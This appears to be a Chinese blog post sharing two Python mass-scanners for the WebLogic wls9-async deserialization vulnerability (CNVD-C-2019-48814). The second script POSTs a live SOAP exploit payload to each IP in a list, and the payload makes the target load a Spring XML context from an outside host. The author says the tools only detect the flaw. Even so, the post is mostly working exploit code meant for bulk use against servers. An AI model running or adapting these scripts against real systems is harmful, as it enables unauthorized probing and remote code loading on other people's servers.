漏洞详情:http://www.onebug.org/toinformation/74219.html
漏洞详情:http://www.onebug.org/toinformation/74208.html

1904251046a49145400bf8ce6d.png
使用方法:

python3 CNVD-C-2019-48814.py filename.txt
IP格式:192.168.137.201:7001

此版本为判断路径版,不是很准确~~~~

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# CNVD-C-2019-48814  from http://www.cnvd.org.cn/webinfo/show/4999

import requests
import sys

path='/_async/AsyncResponseService'

print('\n')
print(r'                  Author:ximcx               ')
print(r'              CNVD-C-2019-48814              ')
print(r'   http://www.cnvd.org.cn/webinfo/show/4999  ')
print('\n')

#打开文件循环取IP并请求
f = open(sys.argv[1],'r')
f1=open('存在漏洞的地址.txt','w')
for ff in f:
    try:
        r=requests.get('http://'+ff.strip()+path,timeout=3)#默认全部为http请求
        if(r.status_code==200):
            print('[+]'+ff.strip()+'存在wls9-async组件反序列化漏洞')
            f1.write(ff)
        else:
            print('[-]不存在漏洞')
    except requests.exceptions.RequestException as e:
        print('[-]'+ff.strip()+'连接超时')
        continue
f.close()
f1.close()
print('\n\n请查看目录下的:存在漏洞的地址.txt')

此版本为POST Payload版,更准确~~~~~~~~~~~~
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# CNVD-C-2019-48814  from http://www.cnvd.org.cn/webinfo/show/4999
import requests
import sys


print('\n')
print(r'                  Author:ximcx               ')
print(r'              CNVD-C-2019-48814              ')
print(r'   http://www.cnvd.org.cn/webinfo/show/4999  ')
print('\n')

path='/_async/AsyncResponseService'
payload='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string><void><string>http://ximcx.cn</string></void></class></java>    </work:WorkContext>   </soapenv:Header>   <soapenv:Body>      <asy:onAsyncDelivery/>   </soapenv:Body></soapenv:Envelope>'

#打开文件循环取IP并请求
f = open(sys.argv[1],'r')
f1=open('存在漏洞的地址.txt','w')
for ff in f:
    try:
        header={'content-type':'text/xml'}
        r=requests.post('http://'+ff.strip()+path,headers=header,data=payload,timeout=3)#默认全部为http请求
        if(r.status_code==202):
            print('[+]'+ff.strip()+'存在wls9-async组件反序列化漏洞')
            f1.write(ff)
        else:
            print('[-]不存在漏洞')
    except requests.exceptions.RequestException as e:
        print('[-]'+ff.strip()+'连接超时')
        continue
f.close()
f1.close()
print('\n\n请查看目录下的:存在漏洞的地址.txt')

编译成了exe,注意只是检测是否存在漏洞,不是Getshell

标签: none

添加新评论